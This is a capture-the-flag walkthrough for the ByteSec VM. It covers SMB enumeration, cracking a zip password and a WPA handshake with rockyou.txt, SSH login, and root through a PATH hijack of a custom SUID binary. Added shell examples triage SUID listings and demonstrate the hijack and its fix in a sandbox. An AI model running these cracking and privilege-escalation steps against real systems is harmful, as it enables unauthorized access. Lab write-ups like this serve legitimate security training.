Byte Sec

Flags: 2 (the first is user, the second root). Learning: exploit, SMB, enumeration, steganography, privilege escalation. We recommend that you use VirtualBox and not VMware for this VM.

URL: OS ByteSec

Difficulty: Intermediate

Author: Rahul Gehlaut

Enumeration

Set up the machine with a host-only adapter and run netdiscover (as root) to find its IP address. On my attacking machine (Kali Linux) the host-only interface is eth1.

netdiscover -i eth1


The target answers as 192.168.56.116. Scan every TCP port with service and OS detection (-A) and save the normal-format output to a file named nmap (the output flag needs a format letter, -oN for normal output):

nmap -sS -p- -A -oN nmap 192.168.56.116

The SYN scan (-sS) needs root, so run it with sudo if you are not already root.

Open TCP ports: 80, 139, 445 and 2525. Ports 139 and 445 are the NetBIOS session and SMB ports, so Samba is probably running; 2525 is non-standard, and nmap's service detection identifies it as SSH, which we will need later. Read more about Samba shares here

To start, port 80 is open so we will investigate this port with a browser.


At first glance, the bottom of the web page has the following text:

####################GET#####smb##############free 

This is also seen in the page source:


This is a strong hint that Samba is in play, consistent with the open 139 and 445. Let’s enumerate it with enum4linux, a tool for pulling information (users, shares, policies) out of Windows and Samba hosts.

enum4linux 192.168.56.116 


enum4linux prints a list of known usernames (administrator, guest, krbtgt, domain admins, root, bin, none); note that this is the tool’s built-in probe list, not a list of accounts confirmed on the target. The useful part of its output is the share enumeration, which includes a share named smb.

Let’s connect to that share with smbclient, an ftp-like client for SMB/CIFS resources (as computerhope describes it).

Execute the following command:

smbclient //192.168.56.116/smb -U smb

To break this down: //host/smb names the share and -U smb the user to authenticate as. smbclient then prompts for a password; just press Enter, as the share accepts an empty password for this user (-N would skip the prompt entirely). Note that smbclient’s -p is the port option and takes an argument, so it does not belong here.


We are logged in. The share holds two files, safe.zip and main.txt, which we transfer to our machine with get:

ls
get safe.zip
get main.txt

main.txt contains nothing useful, so let’s look at the archive:

unzip safe.zip


The .zip file is password protected. fcrackzip is a zip password cracker that can brute force it with a wordlist:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

To break this down, -D selects a dictionary attack, -p gives the wordlist (rockyou.txt), and -u tells fcrackzip to verify each candidate by actually running unzip on the archive, which weeds out the false positives its quick check would otherwise report. The archive to crack is simply the last argument. The password is printed when a candidate succeeds.


A password has been found:

PASSWORD FOUND!!!!: pw == hacker1

Unzipping the archive with that password gives us a .cap file (user.cap), a packet capture that can be analysed with Wireshark. Lifewire has a decent article on the format. Let’s open the file in Wireshark.

The capture consists of IEEE 802.11 (WLAN) frames, i.e. Wi-Fi traffic; the Wireshark wiki describes the protocol: Wireshark

When a client joins a WPA/WPA2 network, the access point and client exchange a 4-way handshake (EAPOL frames). A capture of that handshake is all that is needed for an offline dictionary attack against the pre-shared key, so let’s check whether this .cap contains one and try to crack it.

aircrack-ng assesses Wi-Fi network security and, given a capture containing a handshake, runs the dictionary attack. Run the following command:

aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt


Aircrack has found a password:

KEY FOUND! [ snowflake ]

A candidate username is also visible in the capture:

blackjax

Now that we have a username and a password, let’s try them over SSH. Recall from the nmap output that SSH is not on its default port:

grep ssh nmap

SSH is on port 2525.

ssh blackjax@192.168.56.116 -p 2525


Privilege Escalation

Let’s upgrade to a proper TTY with the following command (use python3 if python is not installed):

python -c 'import pty;pty.spawn("/bin/bash")'

There are home directories for three users: sagar, smb and blackjax.

This next section will be focusing on exploiting Set User ID (SUID). This is a good article about this if you want to read more:

Recipe for Root

And another website for some priv esc with a section on SUID:

Github

The following command lists every root-owned file on the system with the SUID bit set (errors from unreadable directories are discarded):

find / -user root -perm -4000 -print 2>/dev/null

For reference, these SUID binaries ship with most Linux distributions, so they are not the intended path here and can be set aside (with the caveat that old versions of some of them, sudo for instance, have had their own privilege-escalation bugs):

ping
ping6
passwd
sudo
chfn
arping
gpasswd
chsh
mount
su
umount
newgrp
pppd
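As an added example (this is not code from the original writeup), the following shell helper applies the same triage to a SUID listing: it drops stock binaries that live where the distribution installs them and keeps everything else, so a custom binary such as netscan, or a stock name sitting in an unusual directory, is what remains. The function names, the STOCK_SUID variable and the sample paths /opt/tools/passwd and /usr/local/bin/backup are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not from the original writeup: triage a SUID listing by
# dropping the binaries that ship with the distribution, so only the
# unusual ones (like netscan) remain. The allowlist is the one given above;
# the function and variable names are assumptions made for this example.

STOCK_SUID='ping ping6 passwd sudo chfn arping gpasswd chsh mount su umount newgrp pppd'

# Exit 0 if the basename given as $1 is on the stock list, 1 otherwise.
is_stock() {
    for s in $STOCK_SUID; do
        [ "$s" = "$1" ] && return 0
    done
    return 1
}

# Stock SUID binaries are expected in the system binary directories; a stock
# name anywhere else (say /opt/tools/passwd) deserves a look too.
in_system_dir() {
    case "$1" in
        /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read absolute paths on stdin (the output of the find command above) and
# print only those that are not a stock binary in a stock location.
suspicious_suid() {
    while IFS= read -r p; do
        [ -n "$p" ] || continue
        if is_stock "$(basename "$p")" && in_system_dir "$p"; then
            continue
        fi
        printf '%s\n' "$p"
    done
}

# Constructed sample listing standing in for the find output; the last two
# paths are made up to show both kinds of hit.
SAMPLE='/bin/ping
/usr/bin/passwd
/usr/bin/netscan
/bin/mount
/opt/tools/passwd
/usr/local/bin/backup'

printf '%s\n' "$SAMPLE" | suspicious_suid
```

On a live target, feed it the real listing instead of the sample: `find / -user root -perm -4000 -type f 2>/dev/null | suspicious_suid`. A stock name that survives the filter is not automatically exploitable, and a stock name that gets filtered is not automatically safe; the list only tells you where to look first.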

One of the binaries in the list is clearly not stock:

/usr/bin/netscan

Let’s have a closer look. Run it:

/usr/bin/netscan

Its output looks like that of netstat, which suggests it runs netstat under the hood. strings /usr/bin/netscan should show the command it calls; if netstat appears there as a bare name rather than an absolute path, the binary resolves it through our PATH, and we control PATH.

Let’s exploit this with the following commands:

cd /tmp
echo "/bin/bash" > netstat
chmod 777 netstat
export PATH=/tmp:$PATH
/usr/bin/netscan

These commands create an executable file called netstat in /tmp whose contents run /bin/bash (chmod +x would suffice; 777 is just generous). The export prepends /tmp to PATH, so when netscan looks up netstat it finds our file before the real one, and because netscan runs with root’s effective uid, the shell it spawns is root’s too. If the shell comes back as blackjax rather than root, bash dropped the effective uid because it differed from the real one; put /bin/bash -p in the file instead, which keeps it.


And we are root, and can read the root flag.
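To see exactly why the trick above works, and what the fix for netscan would have been, here is an added example (not code from the writeup or from the ByteSec VM) that re-creates the PATH hijack in a throwaway directory. Nothing in it is SUID, so it runs safely as any user: a stand-in "netscan" calls netstat by bare name, a planted netstat in an attacker-writable directory wins the lookup, and a hardened stand-in that resets PATH and uses an absolute path does not fall for it. The script names, marker strings and directory layout are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not from the original writeup: a safe re-creation of the
# netscan PATH hijack in a throwaway directory. Nothing here is SUID, so it
# runs as any user; the point is to show why a bare-name lookup is the bug
# and what the fix looks like. All file names and marker strings below are
# assumptions made for the demo.

# Build the sandbox: a "system" netstat, a vulnerable stand-in for netscan
# that calls netstat by bare name (trusting the caller's PATH), and a
# hardened stand-in that resets PATH and calls netstat by absolute path.
setup_sandbox() {
    dir=$(mktemp -d) || return 1
    mkdir "$dir/bin" "$dir/tmp"
    printf '#!/bin/sh\necho real-netstat\n' > "$dir/bin/netstat"
    printf '#!/bin/sh\nnetstat\n' > "$dir/bin/netscan"
    printf '#!/bin/sh\nPATH=%s/bin\nexport PATH\n%s/bin/netstat\n' \
        "$dir" "$dir" > "$dir/bin/netscan-fixed"
    chmod +x "$dir/bin/netstat" "$dir/bin/netscan" "$dir/bin/netscan-fixed"
    printf '%s\n' "$dir"
}

# The attacker's side of the writeup: drop a fake netstat into a writable
# directory. On the real box the payload is "/bin/bash" (or "/bin/bash -p"
# if bash drops the effective uid); here it just prints a marker.
plant_payload() {
    printf '#!/bin/sh\necho hijacked\n' > "$1/tmp/netstat"
    chmod +x "$1/tmp/netstat"
}

# Run one of the stand-ins ($2) with the attacker-controlled directory first
# in PATH, exactly like "export PATH=/tmp:$PATH" on the target, and print
# whichever netstat actually ran.
run_victim() {
    PATH="$1/tmp:$1/bin:$PATH" "$1/bin/$2"
}

demo() {
    d=$(setup_sandbox) || exit 1
    plant_payload "$d"
    echo "vulnerable netscan ran: $(run_victim "$d" netscan)"
    echo "hardened netscan ran:   $(run_victim "$d" netscan-fixed)"
    rm -rf "$d"
}

demo
```

The hardened stand-in shows the two things a privileged program must do before running a helper: fix PATH itself rather than inherit it, and name the helper by absolute path. In a C program like netscan the equivalent is to exec /bin/netstat directly with a clean environment instead of handing a bare command name to system().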

Written on May 21, 2020